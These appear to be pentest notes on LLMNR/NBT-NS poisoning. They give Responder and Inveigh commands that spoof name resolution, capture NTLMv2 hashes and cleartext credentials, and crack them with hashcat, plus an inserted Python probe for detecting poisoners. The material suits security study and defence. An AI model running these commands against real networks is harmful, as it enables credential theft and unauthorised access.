LLMNR, NBT-NS Poisoning
ABOUT
Imagine a situation: you need to connect to some local domain, website, or SMB share. You misclick one letter and instead of the \\mil-stash share you type \\mel-stash. The first request goes to the DNS server, but it doesn't know who the hell \\mel-stash is, so the host falls back to an LLMNR/NBT-NS request on the local segment (it works much like ARP, except that ARP maps IPs to MACs while LLMNR maps names to IPs). That's where we come in with Responder (UNIX) or Inveigh (Windows): we poison these requests and make the target think our IP is the right one. The target then tries to authenticate and sends a hash, which we can crack with Hashcat.
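A defender-side check for the mechanism described above, added here and not part of the original notes or of Responder/Inveigh: ask LLMNR for a random name that cannot exist; no legitimate host ever answers such a query, so any reply points at a poisoner on the segment. The multicast group, port and packet layout come from RFC 4795; the function and variable names are my own.

```python
import contextlib, random, socket, string, struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355          # RFC 4795 multicast group and port

def build_llmnr_query(name: str, txid: int) -> bytes:
    """LLMNR query for an A record; the wire format is the DNS one with flags = 0."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    qname = b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)    # QTYPE=A, QCLASS=IN

def parse_llmnr_answer(data: bytes, txid: int) -> list[str]:
    """IPv4 addresses from the A records of a response to txid; [] if not a matching response."""
    if len(data) < 12:
        return []
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not (flags & 0x8000):             # wrong ID, or QR bit not set (a query)
        return []
    pos = 12
    for _ in range(qd):                                  # skip the echoed question section
        while data[pos]:
            pos += data[pos] + 1
        pos += 5                                         # root label + QTYPE + QCLASS
    ips = []
    for _ in range(an):
        if data[pos] & 0xC0 == 0xC0:                     # name given as a compression pointer
            pos += 2
        else:                                            # name given as a plain label sequence
            while data[pos]:
                pos += data[pos] + 1
            pos += 1
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
        pos += 10
        if rtype == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(data[pos:pos + 4]))
        pos += rdlen
    return ips

def probe_for_poisoner(timeout: float = 2.0) -> list[str]:
    # A random canary name cannot exist, so any host that answers is a poisoner candidate.
    name = "canary-" + "".join(random.choices(string.ascii_lowercase, k=10))
    txid = random.randrange(0x10000)
    hits = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        with contextlib.suppress(socket.timeout):        # keep reading until the timeout
            while True:
                data, (src, _) = s.recvfrom(1024)
                hits += [f"{src} claims {name} is at {ip}" for ip in parse_llmnr_answer(data, txid)]
    return hits
```

Run `probe_for_poisoner()` periodically from a monitoring host on each VLAN; an empty list is the expected result, anything else is worth an alert with the source address it reports.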
RESPONDER
MOSTLY LINUX TOOL (BUT THERE IS WIN VERSION)
Overview
Responder is a powerful tool used for LLMNR/NBT-NS poisoning, capable of capturing NTLMv1/NTLMv2 hashes from network traffic. It can operate in both Analysis (passive) mode and Poisoning (active) mode.
Running Responder
To display available options, use:
responder -h
To start Responder with default settings:
sudo responder -I ens451
Common Flags
-A : Analyze mode (passive monitoring without responding)
-I <interface> : Specify network interface
-w : Start WPAD rogue proxy server
Capturing Hashes
Responder listens for authentication requests and captures NTLM hashes when a target attempts to authenticate. These hashes are saved in:
/usr/share/responder/logs
Hashes are stored in the format:
(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt
Example captured log files:
SMB-NTLMv2-SSP-13.13.13.13.txt
HTTP-NTLMv2-13.13.13.13.txt
Cracking NTLMv2 Hashes with Hashcat
hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt
INVEIGH
WINDOWS TOOL
Overview
Inveigh is a PowerShell/C# tool similar to Responder, used for LLMNR, NBNS, and SMB relay attacks on Windows networks.
Running Inveigh (PowerShell Version)
Import-Module .\Inveigh.ps1
Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y
Key Features:
Captures NTLM hashes via LLMNR/NBT-NS spoofing
Supports multiple protocols (DNS, mDNS, SMB, HTTP, LDAP, WebDAV)
Can output logs to a file (C:\Tools directory)
Running Inveigh (C# Version)
The C# version (Inveigh.exe) is more stable and is the recommended option.
.\Inveigh.exe
Default enabled options:
LLMNR & NBNS Spoofing
HTTP/HTTPS Authentication Capture (NTLM)
SMB & LDAP Listening
Interacting with Inveigh
While running Inveigh, press ESC to open the interactive console.
Useful Commands:
GET NTLMV2UNIQUE # Display unique NTLMv2 hashes
GET NTLMV2USERNAMES # Display captured usernames and IPs
GET CLEARTEXT # Display captured cleartext credentials
STOP # Stop Inveigh
Cracking NTLMv2 Hashes with Hashcat
hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt